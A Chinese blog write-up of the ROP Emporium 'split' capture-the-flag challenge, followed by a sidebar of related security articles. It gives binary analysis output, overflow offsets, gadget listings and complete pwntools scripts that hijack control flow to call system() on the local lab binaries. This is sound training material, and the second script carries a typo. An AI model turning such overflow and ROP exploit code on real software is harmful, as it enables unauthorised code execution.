ROP Emporium-split

最新推荐文章于 2024-08-27 17:17:35 发布
最新推荐文章于 2024-08-27 17:17:35 发布
阅读量376 收藏
点赞数
分类专栏: # PWN 文章标签: pwn rop 网络安全 靶机 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/galaxy3000/article/details/122326357
版权

文章目录

概述

ROP Emporium是一个通过一系列的挑战来学习ROP(面向返回的编程)的网站,ROP常用于PWN的场景。

本文记录的是第2个挑战split,地址为https://ropemporium.com/challenge/split.html
在这里插入图片描述

split32

基本信息

下载地址https://ropemporium.com/binary/split32.zip

检查程序的保护,发现NX启用

checksec split32

    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x8048000)

查看程序中的字符串,发现/bin/ls/bin/cat flag.txt

rabin2 -z split32
[Strings]
nth paddr      vaddr      len size section type  string
―――――――――――――――――――――――――――――――――――――――――――――――――――――――
0   0x000006b0 0x080486b0 21  22   .rodata ascii split by ROP Emporium
1   0x000006c6 0x080486c6 4   5    .rodata ascii x86\n
2   0x000006cb 0x080486cb 8   9    .rodata ascii \nExiting
3   0x000006d4 0x080486d4 43  44   .rodata ascii Contriving a reason to ask user for data...
4   0x00000703 0x08048703 10  11   .rodata ascii Thank you!
5   0x0000070e 0x0804870e 7   8    .rodata ascii /bin/ls
0   0x00001030 0x0804a030 17  18   .data   ascii /bin/cat flag.txt

r2分析

使用r2分析,发现main,pwnme,usefulFunction函数

r2 split32
[0x08048430]> aaaa
[0x08048430]> afl

在这里插入图片描述

查看main,发现调用pwnme

pdf @ main

在这里插入图片描述

查看pwnme,发现了memset和read,存在溢出

pdf @ sym.pwnme

在这里插入图片描述

查看usefulFunction,发现system()调用的是ls,不是/bin/cat flag.txt
在这里插入图片描述

思路

溢出,返回地址为system,参数为/bin/cat flag.txt

获取偏移

生成随机字符串

pwndbg> cyclic 200
aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaab

在这里插入图片描述

pwndbg> cyclic -l 0x6161616c
44

利用代码

from pwn import *

p = process('./split32')
elf = ELF('./split32', checksec=False)

offset = 44
cat_flag_address = elf.search('/bin/cat flag.txt').next()
info('cat_flag_address : {}'.format(hex(cat_flag_address)))
system_address = elf.plt.system
info('system_address: {}'.format(hex(system_address)))

payload = 'A' * offset + p32(system_address) + p32(1) + p32(cat_flag_address)
p.sendline(payload)
p.recvuntil('Thank you!')
result = p.recvall()
success(result)

split

思路

是split程序64位的版本,解题步骤和split32类似,但32位和64位传参方式不同,32位是通过栈传参,64位是通过寄存器传参,所以在利用方式上有不同

获取偏移

pwndbg> cyclic 200
aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaab

在这里插入图片描述

pwndbg> cyclic -l 0x6161616b
40

获取gadget

ROPgadget --binary split --only 'pop|ret'
Gadgets information
============================================================
0x00000000004007bc : pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret
0x00000000004007be : pop r13 ; pop r14 ; pop r15 ; ret
0x00000000004007c0 : pop r14 ; pop r15 ; ret
0x00000000004007c2 : pop r15 ; ret
0x00000000004007bb : pop rbp ; pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret
0x00000000004007bf : pop rbp ; pop r14 ; pop r15 ; ret
0x0000000000400618 : pop rbp ; ret
0x00000000004007c3 : pop rdi ; ret
0x00000000004007c1 : pop rsi ; pop r15 ; ret
0x00000000004007bd : pop rsp ; pop r13 ; pop r14 ; pop r15 ; ret
0x000000000040053e : ret
0x0000000000400542 : ret 0x200a

选择pop rdi ; ret 0x00000000004007c3

利用代码

rom pwn import *

p = process('./split')
elf = ELF('./split', checksec=False)

offset = 40
ret_address = 0x00000000004007c3
cat_flag_address = elf.search('/bin/cat flag.txt').next()
info('cat_flag_address : {}'.format(hex(cat_flag_address)))

system_address = elf.plt.system
info('system_address: {}'.format(hex(system_address)))

payload = 'A' * offset + p64(ret_address) + p64(cat_flag_address) + p64(system_address)
p.sendline(payload)
p.recvuntil('Thank you!')
result = p.recvall().strip('\n')
success(result)
galaxy3000
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ROP Emporium一系列题
weixin_44296844的博客
12-21 491
Rop Emporium 最近在学习ROP,发现ROP Emporium这个网站上题目挺好,就一直在做,我这里用到查gadget的工具是ROPgadget,其他工具也是可以的。因为是直接从笔记上粘贴的,所以没有排版啥的,。。 ret2win_32 简单的覆盖返回地址跳转到后门函数 #coding="utf-8" from pwn import * sh=process("./ret2win3...
ROP_Emporium_split
Starr
03-24 261
文章目录1. split32信息收集黑盒测试反汇编Exp调试分析2. split黑盒测试反汇编Exp参考文章 1. split32 信息收集 $ file split32 split32: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=76cb700a2ac0484f
64位函数参数传递方式
热门推荐
qq_35467337的博客
03-08 1万+
64位函数传参方式
小白详解rop emporium
BadRer的博客
08-02 2104
小白详解rop emporium 前言 rop emporium网站上提供了许多构造rop的challenge,作为小白的我从这里开始,专注于rop链的构造。 ps:写完放了好久结果没投出去,我好菜啊-。- 题目 0x0 ret2win32 IDA打开,很容易找到溢出点 char s; // [esp+0h][ebp-28h]可以看出s距ebp的偏移为0x28 m...
ROP Emporium ALL Challenge
Pwnpanda的博客
07-18 979
暑假刷题计划-0x00 水平有限,这些只是前面大部分题目的WP,最后几道题暂时没做 题目来源:ROP Emporium 工具&&环境:IDA Pro、gdb+peda、ROPgadget、radare2、Ubuntu 16 ROP: 一步一步学ROP之linux_x86篇 一步一步学ROP之linux_x64篇 友情链接: 大佬博客:https://firmian...
Rompmporium漏洞:ROP Emporium漏洞
02-15
**ROP Emporium详解** ROP(Return-Oriented Programming)是一种高级的代码注入技术,它在现代计算机安全领域中占有重要地位,特别是在绕过DEP(Data Execution Prevention)和ASLR(Address Space Layout ...
ROP-without-Return-on-ARM-android-:重现报告中的实验
06-30
ROP在Windows、Linux以及MAC OS X平台上的exploitation中已经很普遍了,在iOS的越狱中也经常用到。在android平台怎么样呢?从本质来看,Android上的NativeCode以ARM指令进行执行的,所以只要基于ARM的ROP没问题,...
rop-sample.rar_.comrop_rop_rop源码下载_taobao netty
09-20
在本压缩包中,“rop-sample”项目提供了基于ROP的示例开发代码,这为我们理解ROP的工作原理及其实际应用提供了宝贵的参考资料。 淘宝作为中国领先的电商平台,其内部系统采用了各种先进的技术和框架以确保高效、...
basic rop3-rop
taopaode的博客
03-11 353
pwn——basic rop (ret2system): 老规矩,先checksec一下: 开启了NX,堆栈不可执行,这里提一下,复制文件进虚拟机之后最好改一下权限,命令是: chmod 755 name 放入ida中:发现get()函数,可以溢出 这里与上一道题不同的是NX保护,所以我们无法通过在用户态的栈里写入一些类似system()的命令,所以我们要往内核态的栈里面写,但两个栈内存上是独...
ROPEmporium通关全解(二)
Yale的博客
12-24 392
前言 关于ROP ROP的全称为Return-oriented programming(返回导向编程),这是一种高级的内存攻击技术可以用来绕过现代操作系统的各种通用防御(比如内存不可执行和代码签名等) ROP是一种攻击技术,其中攻击者使用堆栈的控制来在现有程序代码中的子程序中的返回指令之前,立即间接地执行精心挑选的指令或机器指令组。 本系列rop实战题目的背景 来自ROPEmporium 旨在通...
x86 架构中的内存攻击技术 ROP(一)
个人笔记
04-05 2015
返回导向编程(Return-Oriented Programming,ROP)是一种高级的内存攻击技术,主要是为了绕过操作系统的防御手段 NX。该技术往往利用一些已有的漏洞,特别是缓冲区溢出,攻击者控制堆栈调用以劫持程序控制流并执行针对性的机器语言指令序列(gadgets),这些 gadget 组合,就能成功执行我们自己的逻辑。
从头复习ROP(持续更新中)
s1054436218的博客
10-02 623
从头复习ROP 一、前言   从考研结束就一直很浮躁,虽然在实习期间学习运用了一段时间web技术,但是新东西总是不想看,旧的东西又不断忘记。9月研究生开学,也算是新的开始了,沉下心来沉淀一些东西吧。感觉在学校的期间学习二进制是最合适的,所以潜下心来把二进制捡起来。   话不多说了,开始吧。 二、参考资料   大佬们的资料都很浅显易懂,作为基础知识一定要先读一下: 一步一步学...
透过一道基础pwn栈溢出感受函数执行时候的栈的变化。
admin的博客
10-04 206
题源:基本 ROP - CTF Wiki (ctf-wiki.org) 的ret2libc的例一。 这道题很简单,bin/sh和system的地址都给了,只需要控制程序执行流返回到相应的地址即可。但是我在编写payload的时候遇到了点小疑问。 为什么栈上system的地址和他的参数bin/sh的地址之间要隔着四个字节呢? bin_sh_addr = 0x08048721 system_addr = 0x08048303 payload = b'a' * 112 + p32(bin_sh_...
Pwn_CTFShow_01
Trick的博客
11-08 815
Pwn_CTFShow1.PWN签到题2.pwn02 1.PWN签到题 直接 nc 出flag,白给 2.pwn02 file 一下 32bit IDA分析 发现 bin/sh 地址 可以用 cyclic生成字符串,然后gdb run一下,再计算出偏移 cyclic -l 0x...... exp: from pwn import * #p=process('') p=remote('111.231.70.44',28042) paylode='a'*13 + p32(0x8048518)
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8422
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
证券行业加密业务安全风险监测与防御技术研究
qq_61863348的博客
08-27 605
摘要:解决证券⾏业加密流量威胁问题、加密流量中的应⽤⻛险问题,对若⼲证券⾏业的实际流量内容进⾏调研分析, 分析了证券⾏业加密流量⾯临的合规性⻛险和加密协议及证书本⾝存在的⻛险、以及可能存在的外部加密流量威 胁,并提出防御策略和措施。关键字:证券加密业务、加密应用、加密流量、商用密码安全评估、加密风险、加密威胁、监测防御数据爆发式增长的DT(Data technology)时代,加密技术是数据传输的重要保护手段。随着互联网和企业内部流量场景的加密化趋势快速增长,证券行业也面临着更加迫切的加密需求。证券行业涉及
【第79课】服务攻防-中间件安全&IIS&Apache&Tomcat&Nginx&弱口令&错误配置&CVE
Lucker_YYY的博客
08-24 1060
免责声明本文发布的工具和脚本,仅用作测试和学习研究,禁止用于商业用途,不能保证其合法性,准确性,完整性和有效性,请根据情况自行判断。如果任何单位或个人认为该项目的脚本可能涉嫌侵犯其权利,则应及时通知并提供身份证明,所有权证明,我们将在收到认证文件后删除相关内容。文中所涉及的技术、思路及工具等相关知识仅供安全为目的的学习使用,任何人不得将其应用于非法用途及盈利等目的,间接使用文章中的任何工具、思路及技术,我方对于由此引起的法律后果概不负责。知识点1、中间件-IIS-短文件&解析&&写权限。
EV代码签名证书——消除软件下载时的安全警告
joySSL_的博客
08-27 631
开发公司和软件开发人员在发布应用程序后,当用户尝试下载并安装应用程序时,被SmartScreen识别为不常见或尚未建立起良好的信誉度,系统就会发出警告,提示用户该应用程序可能对电脑构成风险。最后在选择代码签名证书时一定要选择受信任的CA颁发的证书,否则部署完成之后无法被Windows识别还是一样会提示安全风险,可以先向JoySSL提交代码签名证书需求,如果不知道如何选择代码签名证书,也会有工作人员协助建议。:CA机构会发出代码签名证书Ukey,在收到证书后,你需要在相应的开发环境中安装证书。
【架构设计】安全架构设计
最新发布
师兄怎么办
08-27 881
在当今以计算机、网络和软件为载体的数字化服务几乎成为人类社会赖以生存的手段,与之而来的计算机犯罪呈现指数上升趋势,因此,信息的可用性、完整性、机密性、可控性和不可抵赖性等安全保障有位重要,为满足这些诉求,离不开好的安全架构设计。GB/T 9387.21995 给出了基于OSI参考模型的7层协议之上的信息安全体系结构。
RopRop框架:构建服务开放平台的解决方案
Rop的配置文件rop-spring.xml在其中起到关键作用,它管理RopRequestContext和RopRequest,通过XxxService处理具体的业务逻辑,并将响应对象返回给客户端。这种设计使得Rop能够高效地处理服务请求,同时减轻了开发者...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值